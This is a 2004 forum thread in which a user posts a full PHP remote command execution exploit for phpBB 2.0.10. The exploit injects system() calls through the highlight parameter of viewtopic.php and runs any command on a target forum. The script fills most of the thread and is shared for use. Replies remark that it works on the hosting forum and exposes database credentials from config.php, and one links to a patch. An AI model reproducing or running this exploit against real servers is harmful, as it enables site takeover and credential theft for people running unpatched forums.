phpBB 2.0.10 execute command Exploits

Discussion in 'Open Source' started by firewall, Nov 26, 2004.

Thread Status:
Not open for further replies.
  1. firewall

    firewall New Member

    Joined:
    Mar 31, 2004
    Messages:
    299
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Kolkata - INDIA
    Remote command execution exploit for phpBB 2.0.10 that makes use of a flaw in the viewtopic.php code.

    Code:
    #!/usr/bin/php -q
    <?php
    /*
    # phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
    # 15th November 2004 : 4:04 a.m
    #
    # bug found by How Dark (http://www.howdark.com) (1st October 2004)
    #
    # Requirement:
    #
    #    PHP 4.x with curl extension;
    #
    # ** Selamat Hari Raya **
    */
    
    if (!(function_exists('curl_init'))) {
        echo "cURL extension required\n";
        exit;
    }
    
    if ($argv[2]){
        $url = $argv[1];
        $command = $argv[2];
    }
    else {
        echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
        echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
        echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
        echo "\ttopic_id\t topic id\n";
        echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
        exit;
    }
    if ($argv[3])
        $topic = $argv[3];
    else
        $topic = 1;
    
    if ($argv[4])
        $proxy = $argv[4];
    
    
    $cmd = str2chr($command);
    
    $action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";       
    $ch=curl_init();
    if ($proxy){
        curl_setopt($ch, CURLOPT_PROXY,$proxy);
    }
    curl_setopt($ch, CURLOPT_URL,$url.$action);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    $res=curl_exec ($ch);
    curl_close ($ch);
    echo $res;
    
    function str2chr($str){
    
        for($i = 0;$i < strlen($str);$i++){
            $chr .= "chr(".ord($str{$i}).")";
            if ($i != strlen($str) -1)
                 $chr .= "%252e";   
        }
        return $chr;
    }
    ?> 
    --- Dont ask how to use it..... ;) ----
     
  2. it_waaznt_me

    it_waaznt_me Coming back to life ..

    Joined:
    Nov 30, 2003
    Messages:
    2,023
    Likes Received:
    10
    Trophy Points:
    38
    Location:
    A bit closer to heaven
    Ha Ha ha ...
     
  3. go4inet

    go4inet New Member

    Joined:
    Feb 18, 2004
    Messages:
    300
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Chennai
    lol @ you guys, when you run those exploits, you can see the dbname. dbadmin . dbhost from config.php file !

    I dont think this is allowed heere ? Batty ?
     
  4. flashweb

    flashweb New Member

    Joined:
    Nov 27, 2004
    Messages:
    35
    Likes Received:
    0
    Trophy Points:
    0
    Yes, the exploit is valid for this forum :)

    But here forum run as nobody. Still it will show content of php files, directory listing etc... If you run the forum as privilaged user (phpsuexe) anyone can hack the web site. It is very easy to patch this exploit

    http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
     
  5. go4inet

    go4inet New Member

    Joined:
    Feb 18, 2004
    Messages:
    300
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Chennai
    I am waiting for digit forum to update with v2.0.11 ! Guess thats the latest version !
     
Thread Status:
Not open for further replies.

Share This Page